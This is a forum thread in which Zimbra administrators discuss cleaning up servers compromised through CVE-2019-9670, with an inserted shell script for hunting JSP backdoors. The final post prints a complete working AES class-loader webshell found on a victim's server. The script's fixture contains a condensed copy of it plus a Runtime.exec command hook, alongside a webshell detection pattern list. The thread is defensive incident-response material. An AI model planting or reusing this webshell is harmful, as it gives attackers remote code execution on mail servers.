CVE-2019-9670 being actively exploited (Hacked Server)
Re: CVE-2019-9670 being actively exploited
Hi ng
My Zimbra machine is compromised.
If I delete the zmswatch script and the zmswatch crontab entry, after a few hours the script returns.
How can I find the source of the malware?
How can I delete the script for good?
Please help me!
Thanks, Stefano
Re: CVE-2019-9670 being actively exploited
Have a read over the whole thread... I'll give a few thoughts here, but this is not everything.
You've most likely got a cron job re-downloading the malicious script. There may also be malicious js files scattered through the jetty/webapps folders.
I found that uninstalling wget and curl stopped the scripts from reinfecting. This may give you a better chance to clean things up, but they may also use other tricks.
Start planning how you can migrate to a clean install on a clean OS. Do not assume you have cleaned it all out.
Disable SSH access from outside the local network if you are working on the same network the server is located on. Some of the attacks appear to have sent the zimbra SSH keys to the attacker, allowing them SSH access until you can regenerate those keys.
Re: CVE-2019-9670 being actively exploited
Stemond11 wrote:
Hi ng
How can I find the source of the malware?
How can I delete the script for good?

Read the whole thread and/or the blog post linked here; you will find guidelines on how to clean up your system.
Re: CVE-2019-9670 being actively exploited
The ZMCAT solution was posted in a previous post.
I have zmswatch in the crontab, and after I delete/kill it, it comes back!
In /tmp, JSP requests like this one show up every 30 seconds and are read-only:
WHY??
<Configure class="org.eclipse.jetty.webapp.WebAppContext">
<Get name="securityHandler">
<Set name="loginService">
<New class="com.zimbra.cs.servlet.ZimbraLoginService">
<Set name="name">Zimbra</Set>
</New>
</Set>
<Set name="authenticatorFactory">
<New class="com.zimbra.cs.servlet.ZimbraAuthenticatorFactory">
<Set name="urlPattern">//downloads/*</Set>
</New>
</Set>
</Get>
</Configure>
Re: CVE-2019-9670 being actively exploited
Stemond11 wrote:
The ZMCAT solution was posted in a previous post.
I have zmswatch in the crontab, and after I delete/kill it, it comes back!

It's the same infection, just more widely spread on the system. The cleanup steps are basically the same: first of all patch your system, then clean up all the mess: cron, unwanted JSPs and so on.
Re: CVE-2019-9670 being actively exploited
I have just deleted the crontab.
Where do I find the unwanted JSPs?
Here? /opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp
Thank you,
Stefano
Re: CVE-2019-9670 being actively exploited
After:
maxxer wrote:
Stemond11 wrote:
The ZMCAT solution was posted in a previous post.
I have zmswatch in the crontab, and after I delete/kill it, it comes back!

It's the same infection, just more widely spread on the system. The cleanup steps are basically the same: first of all patch your system, then clean up all the mess: cron, unwanted JSPs and so on.
===
What should I clean up?
How do I figure out which JSP files are unwanted?
Thanks,
Re: CVE-2019-9670 being actively exploited
Stemond11 wrote:
I have just deleted the crontab.
Where do I find the unwanted JSPs?
Here? /opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp
Thank you,
Stefano

The infection creates new JSPs and edits existing ones with "control code". This way the attacker can remotely execute commands on your compromised system. Patching after infection is not enough; you need to find all those "backdoors" and remove them or replace them with the ones from the source (install packages).
Please read the blog on maxxer's site, as he linked to at the start of this topic.
This might be hard if you're not an experienced sysadmin. Maybe this will help you to find those files:
grep -R '(request\.getParameter.*' /opt/zimbra/mailboxd
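The grep in the post above is a good start but it is noisy (it also hits legitimate pages that read a request parameter) and it cannot see a backdoor that uses no `getParameter` at all. The following is an added example, not code from this thread or from Zimbra. It does two things a practitioner would want here: it scores each `*.jsp*` file (which also catches the `.jsp.ORG` copies the attacker leaves beside the originals) by how many distinct webshell fragments it contains, so a single `getParameter()` is ignored while a class-loader shell of the kind posted later in this thread scores five; and it diffs the tree against an md5 manifest built on a clean install of the same build, which is the practical form of "replace them with the ones from the install packages". It assumes GNU grep, md5sum and awk, paths without spaces, and the default path `/opt/zimbra/mailboxd` from the grep above; the fixture files, including the condensed copy of the AES loader, are constructed for the demo.

```shell
#!/bin/sh
# Added example, not from the thread or from Zimbra: hunt for JSP backdoors
# under a mailboxd/webapps tree and diff the tree against a manifest taken
# from a clean install of the same build. Paths with spaces are not handled.

# Fragments that together indicate a Java webshell. One alone is weak (the
# grep above also hit a legitimate getParameter() in Offline_jsp.java); the
# AES class-loader shell found in XZimbra.jsp later in this thread hits five.
WEBSHELL_PATTERNS='extends ClassLoader|defineClass|Cipher\.getInstance|BASE64Decoder|Base64\.getDecoder|Runtime\.getRuntime\(\)\.exec|ProcessBuilder|request\.getParameter'

# scan_jsp ROOT [MIN_SCORE]  ->  "score<TAB>path" for each *.jsp* file whose
# number of distinct fragments is >= MIN_SCORE (default 2). The glob also
# catches the .jsp.ORG copies the attacker left next to the originals.
scan_jsp() {
    root=$1
    min=${2:-2}
    find "$root" -type f -name '*.jsp*' | while IFS= read -r f; do
        score=$(grep -oE "$WEBSHELL_PATTERNS" "$f" 2>/dev/null | sort -u | wc -l)
        if [ "$score" -ge "$min" ]; then
            printf '%s\t%s\n' "$score" "$f"
        fi
    done
    return 0
}

# build_manifest ROOT  ->  "md5  ./relative/path" for every *.jsp* file.
# Run it on a CLEAN install of the same Zimbra build and keep the output;
# a manifest built on the compromised box only certifies the backdoors.
build_manifest() {
    ( cd "$1" && find . -type f -name '*.jsp*' -exec md5sum {} + | sort -k2 )
}

# check_manifest ROOT MANIFEST  ->  ADDED / MODIFIED / MISSING lines, so a
# backdoor dropped as a new file and one spliced into an existing page are
# both caught, unlike a pattern grep alone.
check_manifest() {
    build_manifest "$1" | awk -v m="$2" '
        BEGIN { while ((getline line < m) > 0) { split(line, a, " "); known[a[2]] = a[1] } }
        {
            seen[$2] = 1
            if (!($2 in known))        print "ADDED " $2
            else if (known[$2] != $1)  print "MODIFIED " $2
        }
        END { for (p in known) if (!(p in seen)) print "MISSING " p }'
}

# make_fixture  ->  path of a constructed mini webapps tree: a clean manifest
# is built, then an infection is simulated the way the thread describes it
# (a new loader JSP plus an existing page with a command hook appended).
make_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/webapps/zimbra/public" "$d/webapps/zimbra/js/zimbra/csfe"
    # Benign page with a single getParameter(), like the Offline_jsp.java hit above.
    printf '<%%@ page contentType="text/html" %%>\n<%% out.print(request.getParameter("retryOnError")); %%>\n' \
        > "$d/webapps/zimbra/public/Offline.jsp"
    printf '<%% out.print("login"); %%>\n' > "$d/webapps/zimbra/public/login.jsp"
    build_manifest "$d" > "$d/clean.manifest"
    # Constructed, condensed copy of the AES class-loader shell shown in this thread.
    cat > "$d/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp" <<'EOF'
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("k")!=null){session.putValue("u","x");return;}Cipher c=Cipher.getInstance("AES");new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance();%>
EOF
    # Existing page edited with "control code".
    printf '<%% Runtime.getRuntime().exec(request.getParameter("c")); %%>\n' >> "$d/webapps/zimbra/public/login.jsp"
    echo "$d"
}

case "${1-}" in
    demo)  r=$(make_fixture); scan_jsp "$r"; check_manifest "$r" "$r/clean.manifest"; rm -rf "$r" ;;
    scan)  scan_jsp "${2:-/opt/zimbra/mailboxd}" ;;
    check) check_manifest "${2:-/opt/zimbra/mailboxd}" "$3" ;;
esac
```

Run `sh jsphunt.sh scan` on the infected box to get the scored list, and `sh jsphunt.sh check /opt/zimbra/mailboxd clean.manifest` with a manifest produced by `build_manifest` on a clean install of the same build. Also check the compiled copies under `mailboxd/work/zimbra/org/apache/jsp`: Jetty regenerates them from the source JSPs, so delete the stale `_jsp.java`/`.class` pairs of any file you replace, or the old backdoor class can remain loaded until restart.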
Re: CVE-2019-9670 being actively exploited
Hello all!
I have the same issue on 8.6 on Ubuntu.
- added the patch
- cleaned /var/spool/cron/crontabs/zimbra (line at the end)
- cleaned /opt/zimbra/log/zmswatch and zmswatch.sh
- removed the added email accounts (only one)
- changed the admin password for the zimbra user
- can't find any strange .jsp files
- cleaned the /opt/zimbra/data/tmp/.zmswatch.xxx files
zmswatch still keeps popping up...
After cleaning like above, zmswatch started without the Zimbra server running.
Any ideas or thoughts about this?
Re: CVE-2019-9670 being actively exploited
[root@xxxx ]# grep -R '(request\.getParameter.*' /opt/zimbra/mailboxd
/opt/zimbra/mailboxd/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp.ORG:<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
/opt/zimbra/mailboxd/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp:<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
/opt/zimbra/mailboxd/work/zimbra/org/apache/jsp/public_/Offline_jsp.java: out.print(request.getParameter("retryOnError"));
What does this mean???